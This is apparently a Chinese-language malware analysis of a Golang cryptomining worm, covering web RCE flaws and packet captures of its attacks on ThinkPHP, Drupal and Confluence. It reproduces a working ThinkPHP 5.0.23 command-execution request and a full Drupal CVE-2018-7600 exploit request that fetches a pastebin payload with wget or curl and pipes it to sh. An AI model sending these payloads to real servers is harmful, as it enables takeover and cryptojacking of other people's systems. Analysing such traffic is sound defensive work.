1、web應(yīng)用遠(yuǎn)程命令執(zhí)行漏洞
RCE漏洞,可以讓攻擊者直接向后臺(tái)服務(wù)器遠(yuǎn)程注入操作系統(tǒng)命令或者代碼,從而控制后臺(tái)系統(tǒng)。一般出現(xiàn)這種漏洞,是因?yàn)閼?yīng)用系統(tǒng)從設(shè)計(jì)上需要給用戶提供指定的遠(yuǎn)程命令操作的接口。比如我們常見(jiàn)的路由器、防火墻入侵檢測(cè)等設(shè)備的web管理界面上,一般會(huì)給用戶提供一個(gè)ping操作的web界面,用戶從web界面輸入目標(biāo),提交后,后臺(tái)會(huì)對(duì)該P(yáng)地址進(jìn)行一次ping測(cè)試,并返回測(cè)試結(jié)果,而,如果,設(shè)計(jì)者在完成該功能時(shí),沒(méi)有做嚴(yán)格的安全控制,則可能會(huì)導(dǎo)致攻擊者通過(guò)該接口提交意想不到的命令,從而讓后臺(tái)進(jìn)行執(zhí)行,從而控制整個(gè)后臺(tái)服務(wù)器
2、golang挖礦蠕蟲(chóng)
樣本6dcbd7ff8aeeb8e9fff861cbea912c2d使用了7種不同的方法:4個(gè)web應(yīng)用程序漏洞(2個(gè)針對(duì)ThinkPHP,1個(gè)針對(duì)Drupal, 1個(gè)針對(duì)Confluence), SSH憑據(jù)枚舉,Redis數(shù)據(jù)庫(kù)密碼枚舉,并嘗試使用找到的SSH密鑰連接其他機(jī)器。本文分析web類(lèi)型漏洞2 targeting ThinkPHP, 1 targeting Drupal, and 1 targeting Confluence
3、PCAP分析
golangpcap下載
80掃描行為
CVE-2019-3396?Confluence
ThinkPHP5 5.0.23 RCE
thinkphp 5.0.23(完整版)
(post)public/index.php?s=captcha (data) _method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=ls -al
CVE-2019-9082
CVE-2018-7600?Drupal
Drupal是一款開(kāi)源的PHP內(nèi)容管理系統(tǒng),使用廣泛,全球超過(guò)100萬(wàn)個(gè)網(wǎng)站(包括政府,電子零售,企業(yè)組織,金融機(jī)構(gòu)等)使用。
CVE-2018-7600漏洞[4]的利用POST包如下:
POST /user/register?element_parents=timezone/timezone/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1
Host: 61.141.0.*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
Content-Length: 215
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip
form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=exec&mail[#type]=markup&mail[#markup]=((wget -q -O- https://pastebin.com/raw/xvfxprtb || curl -fsSL https://pastebin.com/raw/xvfxprtb) | base64 -d) | sh
參考
【1】CVE-2019-9082?https://vuldb.com/?id.131158
【2】thinkphp 5.X RCE?https://www.exploit-db.com/exploits/46150
【3】RCE?http://www.hackdig.com/?11/hack-15364.htm
【4】http://blog.nsfocus.net/cve-2018-7600-analysis/
